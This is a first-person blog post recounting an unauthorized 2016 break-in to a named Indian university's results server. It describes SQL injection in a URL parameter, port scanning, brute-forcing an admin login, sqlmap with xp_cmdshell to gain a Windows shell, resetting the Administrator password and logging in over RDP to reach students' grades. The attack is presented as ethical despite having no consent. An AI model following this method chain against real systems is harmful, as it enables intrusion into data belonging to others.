As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it’s way much cooler to take over the server directly and gain system SHELL privileges.
Of course, both vulnerabilities from the server-side and the client-side are indispensable in a perfect penetration test. Sometimes, in order to take over the server more elegantly, it also need some client-side vulnerabilities to do the trick. But speaking of finding vulnerabilities, I prefer to find server-side vulnerabilities first.
31st August 2016
VTU announced the 2nd semester choice based credit system results. looking at the grades I was happy with the results.
From a pentester’s view, I tend to know how the website functions I had that adventure to get to know and learn everything.
Visvesvaraya Technological University (VTU) is a collegiate public state university in Karnataka, India. It was established by the Government of Karnataka.
VTU is one of the largest universities in India with 212 colleges affiliated to it with an intake capacity of over 467,100 undergraduate students and 12,666 postgraduate students. The university encompasses technical and management fields which offers a total of 30 undergraduate and 71 postgraduate courses. The university has around 1800 PhD candidates.
VTU has 13 QIP centers and 17 extension centers in its affiliated colleges offering postgraduate courses. It has around 2,305 departments recognized as research centers which are spread across its affiliated institutions in cities of Karnataka.
Just a quick glance at how big VTU is
VTU offers undergraduate engineering programs that award a Bachelor of Engineering (BE) or Bachelor of Technology(B.Tech) degree. The university offers postgraduate programs that lead to Master of Technology (M.Tech), Master of Science(MSc) by research, Master of Business Administration (MBA), Master of Computer Applications (MCA) and doctorate (Ph.D). The MSc and PhD are research degrees while the rest are taught degrees.
Okay, enough. How on earth did you hack VTU?
We are living in the world of Internet right now, where everything is connected to Internet and anything which is connected to Internet is easily exploited. According to me, NOTHING or NOBODY is safe when it comes to privacy or security.
Speaking of privacy it died when you guys accepted all terms and conditions without reading any one of them. People just choose security over privacy.
Day 1, 31st August 2016
My Friend, who knew that I knew something about hacking (completed C.E.H at the age of 17) advised me to do something to the website. At first I hesitated. Obviously I knew it was not that easy to hack VTU servers also doing so I would end my life behind bars if something goes wrong.
To be honest even never dreamed that I would successfully compromise the servers. I thought VTU would take the security measures.they would secure their servers at any cost.
Later that evening when I was back to home from college, I checked my grades once again and saw the URL of the website which was
That was the AHA MOMENT for me.
The URL was catchy and it was not encoded and no validation added to that particular GET request. I have done many projects on building website wordpress,magneto,Java web applications,drupal,joomla etc.but I never worked on .net websites so I wanted to know how this website were built and functions. did a research and found this.
- Notice results2016.aspx?. An ASPX file is a server-generated web page that may contain VBScript or C# code. It is often written with Microsoft Visual Web Developer and designed for the Microsoft ASP.NET framework.
- Now it’s clear that the server is Windows. Notice usn=*****&sem=2 Here usn and sem are the GET id which I ask the server to provide the info.
- All it does is creates an SQL query asking database to provide the output. The SQL query is “select * from database_name where usn=**MyUSN**&sem=2”
- Looking at this I wanted to know if SQL Injection works.
- Fired up my Firefox had a handy extension installed called “HACKBAR”. SQL injection techniques just inserted a comma at the end of URL to check if the website was vulnerable.
- Although I did not get any SQL error message but it failed to fetch the data from the database.
And the adventure began…
I wanted to know that instead of giving out my usn and sem. can I send some other SQL queries.
With few basic trial and error methods and with extreme patience finally I got the injection point and could read and dump all the database which belongs to result.vtu.ac.in
Took the screenshot so that I could submit it to the VTU officials one day.
Sigh of a relief that my time had not been wasted till then
Above screenshot which was taken while penetration testing shows 9 Databases
NOTE: I’m not an EVIL Hacker. Not even thought of becoming a BLACK HAT. I just love testing and playing with servers it kind off adventure to get to know how the backend really works.
What will an Ethical Hacker do when he can read the database? Likely he will try to get the users and passwords
So, now tried to get the MSSQL server 2005 database password. Yes did get the password but it was encrypted and hashed with SALT making it harder to decrypt.
I may have to blur the hashes for safety concerns.
I tried to crack the hash with hashcat and also with rainbow tables, unfortunately nothing seemed to be worked. I could not crack the password because the passphrase was complex.It was about 2 in the morning and I was tired. I decided to give up thinking nothing is going to work now.Hacking VTU is impossible and the server is secured.
Day 2, 1st September 2016
Back from the college at 4, Again could not get this VTU server thing out of my head. if I can get the password hashes there must be an some other way.
So went back to basics again scanned the whole website again. scanned the ports using NMAP.
- Port-22 sshd was open but it was maintained by the CYBERROAM security company.
- Port-80 Httpd 7.5 OPEN
- Port-8080 https-alt closed.
- Port-1433 ms-sql-server OPEN
- Port-3389 RDP service OPEN
What is the difference between open port and closed port?
- Closed Port: If you send a SYN packet to a closed port, it will respond back with a RST.
- Filtered Port: Presumably, the host is behind some sort of firewall. Here, the packet is simply dropped and you receive no response (not even a RST).
- Open Port: If you send a SYN packet to an open port, you would expect to receive SYN/ACK.
To be clear, Consider a open port as your friend when you send an SYN packet(Good Morning) to your friend you would expect him to reply back with SYN/ACK(Good morning). Consider an Filtered Port as an teacher when you send an SYN packet(Hi) to your teacher. The teacher may or may not reply depending on the teacher ie firewall configuration. Consider an Closed Port as an Princi where you cannot talk. all the packets sent do not reach him.
Now the more details about the Server the easier to find the vulnerability.
By crawling deep into the website I did find some useful URLS. This confirmed me that CYBEROAM was provding the so called security and hardware resources to the VTU. Which had no impact. They just failed to secure vtu servers.
Tried to bruteforce the logins of the CYBERROAM admin panel. Hoping so username would be Admin and password would be [email protected] exactly like my Computer HOD’s login.
How did I come to know my HOD’s Login?. Shoulder surfing.. :P. Obviously brute forcing the users and password did not work.I did not use many wordlists trying out too many login attempts at short interval of time may raise few eyebrows.
I knew now I’m dealing with someone stronger than VTU when it comes to cyber security but I had no fear. Because my main aim of penetration testing was to find some vulnerability and report it not to misuse.
FAILED, again very frustrated had to calm myself down. Did a fun chat with Cyberroam 😛
Day 3, 2nd September 2016
Back to ZERO..What to do next? Give up?
Nah? Keep doing something unless or until you get to it. I fired up Msfconsole and tried to get meterpreter session by SQLi injection.
Tried several exploits. I don’t have a Metasploit pro version which has latest exploits Guys if your reading this “Please get a Metasploit pro for free..”
There were so many instances that made me feel to quit. Even stopped all the process switched off my PC. and again just could not get this thing out of my mind.
It kept taunting me. As many get addicted to smoking, drinking & drugs it was a clear sign that I was Addicted to hacking. Sleepless nights constantly forcing me to hack the server.
It was really hard to find the right vulnerability and get the system.
While trying so many different ways to get into the server, finally with some advanced sqlmap tool using –tamper and –level –risk finally got the –os-shell.
The sqlmap automatically enable the xp_cmdshell module in that database which gets the os-shell.
So finally, I got the Actual OS-shell i.e CMD of the Remote Server
What is CMD?
The Command Prompt in Windows provides access to over 280 commands! These commands are used to do certain operating system tasks from a command line interface instead of the graphical Windows interface we use most of the time.
Hence when you have an os-shell what else you can do? The answer is anything. I was still looking for the full details about the server here is the screenshot of the systeminfo command.
Went through each and every drive. I almost had access to all the files which is stored in the VTU server.when you have and actual Administrator shell what can we do? Almost Everything.
NOTE: I did not delete modify or alter any file which was saved on the server. All I was doing for good cause.
Enumerated the users surprisingly there were 4 users.
- Administrator ( default one and every windows computer has one)
I did Actually reset the Administrator password by using net user * command.
Successfully changed the Administrator password. And now I was afraid and concern because remote desktop connection can log out current user and ask for my credentials as windows is not a multi-user operating system.
Connected to Server by using Guest as the username just to check if Remote Desktop connection is enabled. Remember on Day 2, 1st September 2016 when I scanned the whole website port no 3389 was open which indicates that rpd Remote Desktop Protocol was enabled.
Again, Luckily everything seemed to be going okay from the moment when I had the os-shell.
PASSWORD: which had been reset by me from sql injection.
The moment when computer was logged in.
The sql server database was already logged on so that I don’t waste time guessing the same password again.
It presented with a beautiful screen of the 283392 Student’s Marks and grades. Over 2 Lakhs students results was in my hand and if the same access was given to some malicious hacker I bet you he would have changed all the grades.
At this point I feel sorry for VTU. Never expected this would be so easy to Hack. All I needed was patience, basics and few sleepless nights.
Lets just say VTU is careless at everything. When it comes to Syllabus, Exams, Evaluation, and the object of Re-Evaluation is only purpose of Making money.
I literally could hear my heart pounding. I realized I had gone too far by literally having access to all students grades.
What do you guys think I should have doing next? Tell VTU that your server was hacked by a teenage boy? He did something malicious and dropped the whole databases?
The problem was I did know not how to contact officials. However contacted VTU twice by their Helpline number but they were in a hurry to just hang the call. They had no patience to listen to me. Here are the numbers I have tried to call provided in their website. 0831-2498139 and 0831-2498138
Here’s what I decided to do.
I was able to successfully exploit the server only because of xp_cmd shell so I manually turned off the xp_cmd shell and also made sure that none of the hackers can again exploit that system again.
So as xp_cmd shell has been disabled. (No hackers can exploit the server as the same way I did).<– I just Hope so. 😛
At this point I do really feel sorry for VTU. I never expected this was so easy or Let us say that they are very careless at everything.
The Administrator password had been reset by the VTU officials within few hours of compromising the system.
Now by doing this Lets just say VTU did realize that their server Administrator password was changed and Hacked
Not only I compromised the system in another way around I did help VTU to secure their vulnerable server. 😛
After Disabling the xp_cmd shell I lost the connection.
NOTE: I Officially lost all access to the server and also the application is not vulnerable to SQL injections. After few days Event Validation was enabled making sure that other malicious hacker could not inject anything.
Thanks to my friend Rohan, who always got my back making sure that I don’t make stupid decision and land up in trouble.
I DID NOT MODIFY,ALTER, DELETE ANY FILES BELONGING TO THEIR SERVER.
People say that what I did was wrong and I should be ashamed of what I did but after what have been through, I have no regrets of what I have done.
– Before making any attack, do get the party’s consent.
– All this are for learning.
– Do not try in the public.
– I got nothing to do if you are in any legal issues.
The information contained in these web pages is, to the best of our knowledge, true and accurate at the time of publication, and is solely for informational purposes.
Pantomath accepts no liability for any loss or damage how so ever arising as a result of use of or reliance on this information, whether authorized or not.
Pantomath is not responsible for the contents of personal and peripheral web pages, nor for the accuracy or integrity of material accessed via links from these pages. Any comments on these pages should be directed to the post author.
Reproduction, distribution, republication, and/or transmission of material contained within this website are prohibited unless the prior written permission of Pantomath has been obtained.